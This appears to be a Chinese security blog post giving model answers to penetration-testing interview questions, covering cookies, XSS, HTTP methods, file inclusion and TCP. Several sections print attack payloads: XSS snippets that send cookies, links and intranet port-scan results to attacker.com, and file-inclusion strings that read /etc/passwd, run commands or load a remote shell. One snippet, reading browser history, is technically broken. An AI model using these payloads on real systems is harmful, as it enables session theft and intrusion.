安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[🍪 1. Cookie属性详解](#🍪 1. Cookie属性详解)
[🔄 2. Cookie vs Session](#🔄 2. Cookie vs Session)
[🎯 3. 通过XSS获取Cookie后定位后台](#🎯 3. 通过XSS获取Cookie后定位后台)
[⚡ 4. 后台在内网时的XSS高阶利用](#⚡ 4. 后台在内网时的XSS高阶利用)
[🌐 5. HTTP请求方法及安全影响](#🌐 5. HTTP请求方法及安全影响)
[🔧 6. 核心专长领域](#🔧 6. 核心专长领域)
[📂 7. 无上传点的文件包含漏洞利用](#📂 7. 无上传点的文件包含漏洞利用)
[💻 8. 网络与系统原理掌握深度](#💻 8. 网络与系统原理掌握深度)
[🤝 9. TCP三次握手与标志位](#🤝 9. TCP三次握手与标志位)
1、xss通常是用来获取cookie,关于cookie,你了解多少,有多少属性。 2、cookie和session有什么区别 3、假设有这样一个情景,你通过xss可以拿到管理员cookie,你如何知道后台在哪里 4、如果后台在内网里,你无法登录,那么你该怎么办。如何更大效率的利用这个xss 5、HTTP请求方式 6、擅长哪一块 7、有一个网站,存在文件包含漏洞。但是没有上传点。如果是你会怎么利用 8、网络原理,和系统原理这边你怎么样 9、tcp三次握手,标志位
🍪 1. Cookie属性详解
属性 作用 安全意义 HttpOnly
阻止JS通过 document.cookie
读取防御XSS窃取Cookie Secure
仅通过HTTPS传输 防止网络嗅探 SameSite
控制跨站请求携带( Strict/Lax/None
)防御CSRF Domain
定义Cookie生效域名(如 .example.com
允许子域名)避免越域访问 Path
限制Cookie路径作用范围(如 /admin
)缩小攻击面 Expires/Max-Age
设置过期时间 控制会话生命周期 Partitioned
限制Cookie在分区存储(新兴属性) 防御Spectre等旁路攻击
🔄 2. Cookie vs Session
维度 Cookie Session 存储位置 客户端(浏览器) 服务端(内存/数据库) 安全性 低(可直接查看修改) 高(仅ID暴露) 生命周期 可长期保存 通常随浏览器关闭失效 性能影响 无服务端负担 需服务端存储和检索 典型场景 记住登录状态 敏感操作(如支付验证)
🎯 3. 通过XSS获取Cookie后定位后台
实战步骤:
Cookie分析 :
Javascript
// XSS Payload提取管理员Cookie中的路径信息 fetch('https://attacker.com/log?cookie=' + document.cookie);
- 检查Cookie中的
Path
属性(如Path=/admin
)历史记录探测 :
Javascript
// 读取浏览器历史记录中可能的后台路径 for (let path of ['/admin', '/manage', '/wp-admin']) { if (history.indexOf(path) > -1) fetch('https://attacker.com/log?path='+path); }
页面链接扫描 :
注入脚本遍历页面所有链接,匹配关键词:
Javascript
Array.from(document.getElementsByTagName('a')) .map(a => a.href) .filter(url => /admin|manage|backend/.test(url)) .forEach(url => fetch('https://attacker.com/log?url='+url));
⚡ 4. 后台在内网时的XSS高阶利用
当无法直接登录后台时的策略:
Mermaid
graph TB A[XSS持久化] --> B[内网探测] A --> C[权限提升] B --> D[端口扫描] B --> E[服务指纹识别] C --> F[键盘记录] C --> G[钓鱼覆盖]
具体方法:
内网资产测绘 :
Javascript
// 扫描内网常见服务 const ports = [80,443,8080,3306]; ports.forEach(port => { fetch(`http://192.168.1.1:${port}`, {mode: 'no-cors'}) .then(() => fetch(`https://attacker.com/log?ip=192.168.1.1&port=${port}_open`)) });
反向代理建立 :
注入代码创建WebSocket隧道,将内网流量转发至公网钓鱼覆盖攻击 :
篡改页面内容伪造登录框,诱骗管理员输入二次认证凭证浏览器漏洞利用 :
结合XSS触发浏览器0day(如CVE-2024-XXXX)获取系统权限
🌐 5. HTTP请求方法及安全影响
方法 用途 安全风险 GET
获取资源 URL参数暴露/缓存投毒 POST
提交数据 CSRF/参数污染 PUT
上传文件 任意文件上传漏洞 DELETE
删除资源 未授权资源删除 OPTIONS
探测服务器支持的方法 暴露敏感接口信息 TRACE
回显请求内容 导致XST(跨站追踪)攻击 PATCH
部分更新资源 逻辑漏洞导致数据篡改
🔧 6. 核心专长领域
网络安全三维能力矩阵:
Mermaid
pie title 技术能力分布 "Web漏洞攻防" : 35 "内网渗透" : 30 "安全开发" : 25 "漏洞研究" : 10
- Web漏洞攻防:精研SQLi/XSS/SSRF利用链构造及WAF绕过
- 内网渗透:熟悉域渗透框架(ADIDNS/黄金票据)及隐蔽隧道
- 安全开发:具备EXP工具链开发能力(Python/Go)
📂 7. 无上传点的文件包含漏洞利用
四大突破路径:
PHP伪协议利用
Url
?file=php://filter/convert.base64-encode/resource=/etc/passwd ?file=expect://id
日志注入攻击
- 修改User-Agent为恶意代码
- 包含日志文件:
?file=/var/log/apache2/access.log
临时文件竞争
Php
// 结合文件上传临时文件竞争 ?file=/tmp/phpLTE0aG // 爆破临时文件名
远程协议加载
Url
?file=http://attacker.com/shell.txt ?file=ftp://user:pass@attacker.com/cmd.php
💻 8. 网络与系统原理掌握深度
核心知识框架:
领域 掌握要点 网络协议 TCP/IP协议栈(三次握手/四次挥手)、ARP欺骗防御、DNS劫持检测 操作系统 Linux权限模型(SUID/SELinux)、Windows访问控制链(ACL)、进程注入技术 攻防对抗 防火墙绕过(分片重组)、IDS检测规则分析、内存攻击(堆喷射/ROP链)
🤝 9. TCP三次握手与标志位
交互流程:
Mermaid
sequenceDiagram Client->>Server: SYN=1, Seq=x Server-->>Client: SYN=1, ACK=1, Seq=y, Ack=x+1 Client->>Server: ACK=1, Seq=x+1, Ack=y+1
标志位解析:
SYN
:同步序列号(请求建立连接)ACK
:确认数据有效(响应请求)RST
:强制断开连接(异常处理)FIN
:正常结束连接(四次挥手)PSH
:要求接收方立即处理数据URG
:标识紧急数据(与URG指针
配合)安全关联:
- SYN洪水攻击:伪造大量SYN包耗尽服务端资源
- ACK扫描:通过响应判断主机状态(防火墙绕过)